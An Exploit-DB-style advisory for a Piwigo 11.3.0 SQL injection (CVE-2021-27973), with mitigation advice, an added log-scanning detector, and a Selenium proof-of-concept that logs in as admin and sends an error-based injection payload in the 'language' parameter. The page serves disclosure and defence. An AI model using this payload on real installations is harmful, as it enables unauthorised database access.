Vendor: Piwigo
By: nu11secur1ty
CVSS: 7.2 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Piwigo
Affected Version From: 11.3.0
Affected Version To: 11.3.0
Patch Exists: Yes
Related CVE: CVE-2021-27973
CPE: a:piwigo:piwigo:11.3.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2021

Piwigo 11.3.0 – ‘language’ SQL

This exploit allows an attacker to inject malicious SQL code into the 'language' parameter of the Piwigo 11.3.0 web application. By exploiting this vulnerability, an attacker can gain access to the application's database and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users should upgrade to the latest version of Piwigo and ensure that all input is properly sanitized and validated.
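
One way to check web server logs for requests that fail the kind of validation described above. This is an added example, not part of the original advisory or of Piwigo's code. It assumes combined-format access logs and that a legitimate language ID is two letters, an underscore and two letters; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate language ID looks like "fr_FR".
LANG_ID = re.compile(r"[A-Za-z]{2}_[A-Za-z]{2}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_language_requests(log_lines):
    """Return (line_no, decoded value) for admin.php?page=languages requests
    whose 'language' parameter is not a plain language ID."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/admin.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes once
        if "languages" not in params.get("page", []):
            continue
        for value in params.get("language", []):
            if not LANG_ID.fullmatch(value):
                hits.append((line_no, value))
    return hits


# Constructed log lines; line 2 carries the request from the PoC on this page.
SAMPLE_LOG = [
    '192.168.1.10 - - [30/Apr/2021:10:00:01 +0000] "GET /piwigo/admin.php?page=languages&language=fr_FR&action=activate HTTP/1.1" 200 5120',
    '192.168.1.10 - - [30/Apr/2021:10:00:09 +0000] "GET /piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate HTTP/1.1" 200 5342',
    '192.168.1.10 - - [30/Apr/2021:10:00:15 +0000] "GET /piwigo/index.php?language=fr_FR HTTP/1.1" 200 8431',
]

if __name__ == "__main__":
    for line_no, value in suspicious_language_requests(SAMPLE_LOG):
        print(f"line {line_no}: unexpected language value {value!r}")
```

The same allowlist pattern can be enforced server-side before the value reaches any query; matching on the decoded value avoids missing percent-encoded quotes.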

Exploit-DB raw data:

# Exploit Title: Piwigo 11.3.0 - 'language' SQL
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.30.2021
# Vendor: https://piwigo.org/
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
# CVE: CVE-2021-27973

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE-2021-27973

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/piwigo/"

#enter your login username
username="admin"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"

print("Loading... ;)")
time.sleep(1)
browser = webdriver.Chrome()
browser.get((website_link))

try:
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()

    # Languages Exploit
    time.sleep(5)
    browser.get("http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate")

    print("The payload for category Languages is deployed...\n")

except Exception:
    # This exception occurs if the elements are not found in the webpage.
    print("Some error occured :(")